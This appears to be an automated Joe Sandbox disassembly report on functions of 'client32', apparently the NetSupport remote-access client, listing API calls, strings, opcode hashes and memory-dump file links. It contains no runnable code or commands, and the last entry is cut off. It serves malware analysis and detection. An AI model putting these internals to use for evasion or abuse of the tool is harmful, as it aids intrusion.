Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
Opcode Fuzzy Hash: cae4a2d1f4de0a4020005886155d60d9723e04be6fdd3d8070ab79db40d2f8ad
Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50

Function 1103B8B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1103B8E8
_malloc.LIBCMT ref: 1103B97B
_memmove.LIBCMT ref: 1103B9E0
SendMessageTimeoutA.USER32(?,0000004A,00000000,00000007,00000002,00002710,?), ref: 1103BA40
_free.LIBCMT ref: 1103BA47

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsA(), xrefs: 1103B96A, 1103B9A1, 1103B9CD, 1103BA0B
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 1103B965, 1103B99C, 1103B9C8, 1103BA06

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 3610575347-2270926670
Opcode ID: 9ef35ab7b24234e014ff6a33d3d6ceb2a9a77c78702b313de4f60a0c8a7ebb1f
Instruction ID: cf71befd834ca9d6d619551618e05b544aa7bc38abc68460657087db59e74738
Opcode Fuzzy Hash: 9ef35ab7b24234e014ff6a33d3d6ceb2a9a77c78702b313de4f60a0c8a7ebb1f
Instruction Fuzzy Hash: B0514F75E0061E9FDB00CB94CC81EEEF3B9BF98708F104169E526A7280E7316A06CB91

Function 11047874 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 129registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 1104789A
wsprintfA.USER32 ref: 1104798C

Strings

%s (%d), xrefs: 11047A22
8zi, xrefs: 1104792C
\\.\%u\, xrefs: 11047986
"%s", xrefs: 110479D7, 110479E4
"%s" %s, xrefs: 110479CE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewsprintf
String ID: "%s"$"%s" %s$%s (%d)$8zi$\\.\%u\
API String ID: 4060989581-2154618801
Opcode ID: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
Instruction ID: f393627671fb017ea66c5cc56c7c64c93c0c73457dc74dc6be4a09c67f558207
Opcode Fuzzy Hash: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
Instruction Fuzzy Hash: F14106B5E006699BD725CB64CC80FEEB3B8EF45308F1045E8EA5997680EB31AE44CF55

Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1101567A
_memset.LIBCMT ref: 110156BE
RegQueryValueExA.ADVAPI32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8

Strings

NSLSP, xrefs: 11015708
PackedCatalogItem, xrefs: 110156E2
%012d, xrefs: 11015674
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: ca6ba73efa820a3a51f20bf41431e0d9776cb4f4806ff1198f774a28b0e26bbb
Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
Opcode Fuzzy Hash: ca6ba73efa820a3a51f20bf41431e0d9776cb4f4806ff1198f774a28b0e26bbb
Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90

Function 110478A9 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 128registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 110478CA
wsprintfA.USER32 ref: 1104798C

Strings

%s (%d), xrefs: 11047A22
8zi, xrefs: 1104792C
\\.\%u\, xrefs: 11047986
"%s", xrefs: 110479D7, 110479E4
"%s" %s, xrefs: 110479CE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewsprintf
String ID: "%s"$"%s" %s$%s (%d)$8zi$\\.\%u\
API String ID: 4060989581-2154618801
Opcode ID: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
Instruction ID: 0c1333cb51f3e687940ac8a863b18b978c2e00f876245ba0d4622cc4c938ac8c
Opcode Fuzzy Hash: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
Instruction Fuzzy Hash: 1B4106B5E006699BD715CB64CC80FEEB3B8EF45308F1045E8EA5997280EB31AE44CF55

Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
TranslateMessage.USER32(?), ref: 110276E1
DispatchMessageA.USER32(?), ref: 110276EB
Sleep.KERNEL32(000003E8), ref: 11027774
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA

Strings

Bridge, xrefs: 11027697
BridgeThread::Attempting to open bridge..., xrefs: 1102772E, 11027776

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchSleepTranslate
String ID: Bridge$BridgeThread::Attempting to open bridge...
API String ID: 3237117195-3850961587
Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1

Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

Norm, xrefs: 110B9560
m_hWnd, xrefs: 110B957F
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B957A
j CB::OnRemoteSizeNormal(%d, %d, %d, %d), xrefs: 110B9620

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
API String ID: 1092798621-1973987134
Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90

Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
std::bad_exception::bad_exception.LIBCMT ref: 1100F554
__CxxThrowException@8.LIBCMT ref: 1100F562
std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F

Strings

bad cast, xrefs: 1100F54C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 8ef430cf76b05af52279cdd2e867ea64406b61a2b36ff84a2b6443326227b932
Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
Opcode Fuzzy Hash: 8ef430cf76b05af52279cdd2e867ea64406b61a2b36ff84a2b6443326227b932
Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92

Function 11135700 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 1113572F
GetTickCount.KERNEL32 ref: 1113578C

Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18

wsprintfA.USER32 ref: 111357BC

Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702

WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 11135802

Strings

Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
UI.CPP, xrefs: 111357E9
ResponseChk, xrefs: 11135717

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$ExitProcesswsprintf
String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
API String ID: 2020353970-2880927372
Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91

Function 11017B00 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11017B3C
_GetRawWMIStringW@16.PCICL32 ref: 11017B67
CoUninitialize.OLE32 ref: 11017C1C

Strings

HID, xrefs: 11017BB2
USB, xrefs: 11017B96
Win32_PointingDevice, xrefs: 11017B58
PS/2, xrefs: 11017BCE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeStringUninitializeW@16
String ID: HID$PS/2$USB$Win32_PointingDevice
API String ID: 1826621714-1320232752
Opcode ID: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
Instruction ID: d5a300e082a68ff88eaf99d811029957e717e47c388a0f511f099868f117258d
Opcode Fuzzy Hash: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
Instruction Fuzzy Hash: CE312F75A0061BDBDB24DF54CD84BEAB7B8FF48305F0044E5EA09AB244EB75EA84CB50

Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708

Strings

\\.\, xrefs: 110F163B
pcdvxd.386, xrefs: 110F16CD
nsmvxd.386, xrefs: 110F168B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateName$ModulePathShort_strrchr
String ID: \\.\$nsmvxd.386$pcdvxd.386
API String ID: 1318148156-3179819359
Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94

Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 11081859

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

!m_bReadOnly, xrefs: 11081831
IsA(), xrefs: 110817CF, 1108189B
pData, xrefs: 11081814
..\CTL32\DataStream.cpp, xrefs: 110817CA, 110817E8, 1108180F, 1108182C, 1108186F, 11081896
m_nLength>=nBytes, xrefs: 11081874
nBytes>=0, xrefs: 110817ED

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
API String ID: 1528188558-3417006389
Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
